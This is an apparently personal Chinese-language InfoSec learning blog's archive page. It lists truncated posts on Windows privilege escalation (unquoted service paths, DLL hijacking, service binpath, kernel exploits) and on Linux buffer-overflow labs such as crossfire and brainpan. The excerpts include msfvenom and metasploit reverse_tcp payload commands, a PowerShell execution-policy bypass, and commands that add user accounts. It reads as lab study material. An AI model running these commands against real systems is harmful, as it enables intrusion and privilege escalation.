InfoSec learning 
  • Home
  • Archives
  • Categories
  • Tags
  •   
root@whale3070:~# _

未打引号的路径&windows本地提权

我录制了一个演示视频 meterpreter开启监听123456789msfconsolehandler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f ex

2020-02-14
windows
windows

windows-cmd用户管理命令

查看查看用户net user 用户 查看用户组net localgroup administrators(用户组) 查看防火墙状态Windows Server 2012 R2 Standardnetsh advfirewall show allprofiles 添加添加用户net user 用户名 密码 /add /expires:never 添加用户密码net user Administrato

2020-02-12
windows
windows

windows服务提权&dll劫持

参考资料: dll劫持 sc.exe windows 服务管理 youtube视频 制作了一个youtube视频,下面是用到的一些命令。 sc是一个管理主机服务的工具 查看一个服务的运行状态 ,sc query 服务名 查看一个服务的配置信息 ,sc qc 服务名 【windows】 1234567891011whoamiC:\Program Files\DLL Hijack Service\

2020-02-12
windows
windows

binpath本地提权

binpath本地提权是利用了服务权限不正确。在youtube上传了一个演示视频 参考资料:https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_windows.html 上一篇提到过,sc.exe是一个管理windows服务的命令。 检查服务配置的权限是否不安全C:\Users\User\Desktop\Tools\Access

2020-02-12
windows
windows

windows内核提权

参考资料: github项目lpeworkshop youtubu视频 【windows】 123powershell -nop -ep bypassImport-Module C:\Users\whale\Desktop\Tools\Sherlock\Sherlock.ps1Find-AllVulns 【kali】 1234msfconsolehandler -H 192.168.1.100

2020-02-10
windows
windows

查找与修改exp

本地查找exp123searchsploit slmaillocate /643.c 互联网上查找exp可靠的经过验证的公开exp来源: https://www.exploit-db.com/ https://www.securityfocus.com/ exp debug由于软件版本等问题,exp可能会执行不成功。 要搭建对应的操作系统版本和有漏洞的软件,作为目标环境,来测试exp。测试ex

2020-02-07
tools
tools

crossfire&linux缓冲区溢出案例(四)

参考资料:linux程序的常用保护机制 上一篇:crossfire&linux缓冲区溢出案例(三) 生成shellcode上一篇找到了这些坏字符,在生成shellcode的时候必须避免这些字符出现\x00\x09\x0a\x20 1234567[目标主机ip-linux] 192.168.67.128[攻击机ip] 192.168.67.1msfvenom -p linux

2020-02-05
buffer overflow
buffer overflow

brainpan(栈溢出)

题外话:人生其实很简单,想要的就去争取,得到了就珍惜,失去了就忘记。 192.168.67.130 123PORT STATE SERVICE9999/tcp open abyss 10000/tcp open snet-sensor-mgmt http://192.168.67.130:10000 nc 192.168.67.130 9999 根据nc连接结果来看,brainp

2020-01-30
buffer overflow
buffer overflow

brainpan(suid溢出提权)

参考资料:Sneaky(suid+缓冲区溢出提权) 上一篇得到了一个普通权限的shell,通过suid的缓冲区溢出漏洞,得到shell。这也不是第一次遇到了类似情况了。 文件传输whereis gdb结果显示客户机没有gdb,所以传输到kali上分析。 12【目标机】nc -lnvp 8080 -w 5 < /usr/local/bin/validate【kali】nc 192.168.67

2020-01-30
buffer overflow
buffer overflow

crossfire&linux缓冲区溢出案例(三)

参考资料:kali linux之edb–CrossFire缓冲区溢出 Crossfire 1.9.0在接受socket连接的时候,有着bof漏洞。 搭建靶机12345678910111213141516171819mkdir /usr/games #必须在该目录下运行crossfire,否则程序会报错#Cannot open bmaps file /usr/games/crossfire/s

2020-01-28
buffer overflow
buffer overflow
1…7879808182…105

Search

Whale3070
总访问量 次 总访客数 人